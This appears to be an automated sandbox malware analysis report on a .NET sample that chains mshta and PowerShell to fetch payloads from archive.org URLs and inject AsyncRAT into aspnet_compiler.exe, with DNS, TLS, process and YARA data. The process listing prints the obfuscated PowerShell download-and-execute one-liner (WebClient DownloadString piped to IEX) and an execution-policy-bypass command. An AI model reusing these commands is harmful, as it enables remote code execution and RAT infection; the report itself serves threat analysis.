                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.302654982 CEST192.168.2.38.8.8.80xa7b8Standard query (0)ia601502.us.archive.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.073461056 CEST192.168.2.38.8.8.80x7a3bStandard query (0)ia601509.us.archive.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.809737921 CEST192.168.2.38.8.8.80x3460Standard query (0)ia601406.us.archive.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.730957031 CEST192.168.2.38.8.8.80xc597Standard query (0)archive.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.659003973 CEST192.168.2.38.8.8.80xfc0bStandard query (0)ia803408.us.archive.orgA (IP address)IN (0x0001)

                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.373203039 CEST8.8.8.8192.168.2.30xa7b8No error (0)ia601502.us.archive.org207.241.227.112A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.136739016 CEST8.8.8.8192.168.2.30x7a3bNo error (0)ia601509.us.archive.org207.241.227.119A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.880702019 CEST8.8.8.8192.168.2.30x3460No error (0)ia601406.us.archive.org207.241.227.126A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.794511080 CEST8.8.8.8192.168.2.30xc597No error (0)archive.org207.241.224.2A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.723062992 CEST8.8.8.8192.168.2.30xfc0bNo error (0)ia803408.us.archive.org207.241.232.198A (IP address)IN (0x0001)

                                                                                                                                                                                                                  HTTPS Packets

                                                                                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.820400953 CEST207.241.227.112443192.168.2.349715CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.587261915 CEST207.241.227.119443192.168.2.349719CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.297117949 CEST207.241.227.126443192.168.2.349727CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.208666086 CEST207.241.224.2443192.168.2.349728CN=*.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:33 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:08 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                                                  Jun 11, 2021 06:34:24.134897947 CEST207.241.232.198443192.168.2.349729CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  Analysis Process: xGrfj8RvYg.exe PID: 4832 Parent PID: 5728

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:33:57
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\xGrfj8RvYg.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:'C:\Users\user\Desktop\xGrfj8RvYg.exe'
                                                                                                                                                                                                                  Imagebase:0x8c0000
                                                                                                                                                                                                                  File size:20480 bytes
                                                                                                                                                                                                                  MD5 hash:722603AA75534BEC9D1191F062FB2C03
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                  Analysis Process: mshta.exe PID: 1276 Parent PID: 4832

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:33:58
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
                                                                                                                                                                                                                  Imagebase:0x7ff645c70000
                                                                                                                                                                                                                  File size:14848 bytes
                                                                                                                                                                                                                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000003.214415545.00000208942AB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.218422171.00000208942AD000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                  Analysis Process: powershell.exe PID: 3468 Parent PID: 1276

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:34:01
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
                                                                                                                                                                                                                  Imagebase:0x7ff785e30000
                                                                                                                                                                                                                  File size:447488 bytes
                                                                                                                                                                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                  Analysis Process: conhost.exe PID: 1564 Parent PID: 3468

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:34:02
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                  Analysis Process: powershell.exe PID: 3680 Parent PID: 3468

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:34:34
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1
                                                                                                                                                                                                                  Imagebase:0x7ff785e30000
                                                                                                                                                                                                                  File size:447488 bytes
                                                                                                                                                                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                  Analysis Process: aspnet_compiler.exe PID: 6396 Parent PID: 3680

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:34:49
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                  Imagebase:0x780000
                                                                                                                                                                                                                  File size:55400 bytes
                                                                                                                                                                                                                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                  Analysis Process: aspnet_compiler.exe PID: 6800 Parent PID: 3680

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:06:35:09
                                                                                                                                                                                                                  Start date:11/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                  Imagebase:0xa70000
                                                                                                                                                                                                                  File size:55400 bytes
                                                                                                                                                                                                                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                    Analysis Process: xGrfj8RvYg.exe PID: 4832 Parent PID: 5728 xGrfj8RvYg.exeCOMMON

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 00007FFAEE9B002F, Relevance: .6, Instructions: 572COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.200013972.00007FFAEE9B0000.00000040.00000001.sdmp, Offset: 00007FFAEE9B0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 5907ed3c39a1957b8392c359f9d7d95294f79ab0fb9cc8f6676bcde46eea59ee
                                                                                                                                                                                                                    • Instruction ID: 1abbe1b82abd063d966dbf79700c210a19caf15593e5696cc5f0d48ffa459e4b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5907ed3c39a1957b8392c359f9d7d95294f79ab0fb9cc8f6676bcde46eea59ee
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E42138A680E3C58FE75397254CA92A47FB1AF57240B4E44E7D48CCB0E7E95C1808C762
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00007FFAEE9B0078, Relevance: .5, Instructions: 538COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.200013972.00007FFAEE9B0000.00000040.00000001.sdmp, Offset: 00007FFAEE9B0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: e207b9be70543499a6e438ccfe5fd9dd09856e1c7fd549b5323ca09fc6b791f5
                                                                                                                                                                                                                    • Instruction ID: 6ca103c958e97daf1d7fbfc4ca99e6dd0e6ea053b6294d5604e9d81e0088150b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e207b9be70543499a6e438ccfe5fd9dd09856e1c7fd549b5323ca09fc6b791f5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B01AD7580E3C88FD712EB3898992A4BFF0AF57300F0A44E7D448CB193EA291848C752
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    Analysis Process: powershell.exe PID: 3468 Parent PID: 1276 powershell.exeCOMMON

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 00007FFAEDBB15ED, Relevance: 11.2, Strings: 8, Instructions: 1219COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.487577969.00007FFAEDBB0000.00000040.00000001.sdmp, Offset: 00007FFAEDBB0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: gwI$gwI$gwI$gwI$gwI$gwI$gwI$gwI
                                                                                                                                                                                                                    • API String ID: 0-2036721211
                                                                                                                                                                                                                    • Opcode ID: 769adb7ae282ed7a8a85efc374073f3184888ea9abdbb994799198dc78c6be0a
                                                                                                                                                                                                                    • Instruction ID: 32e3ff79e165ac201dbdf72c349e006a2b0d427f2cf81d9391da913543f28040
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 769adb7ae282ed7a8a85efc374073f3184888ea9abdbb994799198dc78c6be0a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC722862A0DB8A0FEB969B2D98652B57FD1EF97260B0841FBD05DC71D3FD189C058382
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00007FFAEDBB25E9, Relevance: 8.7, Strings: 6, Instructions: 1207COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.487577969.00007FFAEDBB0000.00000040.00000001.sdmp, Offset: 00007FFAEDBB0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: gwI$gwI$gwI$gwI$gwI$gwI
                                                                                                                                                                                                                    • API String ID: 0-3292123719
                                                                                                                                                                                                                    • Opcode ID: 2e80560364f1dbf9f2bd594178d3d8b1daf3447c1630d907d4ba0a7c97407d9a
                                                                                                                                                                                                                    • Instruction ID: 8368448de7eb58cffaf7682ae9851cf0d83bf1041350dee756d015f16480c73a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e80560364f1dbf9f2bd594178d3d8b1daf3447c1630d907d4ba0a7c97407d9a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F520162A0DB860FE75AAB2989652B57BE1DF57210B0841FAD49DC71E3FD18AC058383
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00007FFAEDBB0D14, Relevance: 5.3, Strings: 4, Instructions: 268COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.487577969.00007FFAEDBB0000.00000040.00000001.sdmp, Offset: 00007FFAEDBB0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: gwI$gwI$gwI$gwI
                                                                                                                                                                                                                    • API String ID: 0-3585427332
                                                                                                                                                                                                                    • Opcode ID: 61a69b279baa13be9733ddc65d8273f009cbc382d68b140ea122244810d3b0a0
                                                                                                                                                                                                                    • Instruction ID: a9cc9ba5d0ab9fa0c6c1c5e92961c7ffecdb0c17940e95ee927aa62dc8ec13c9
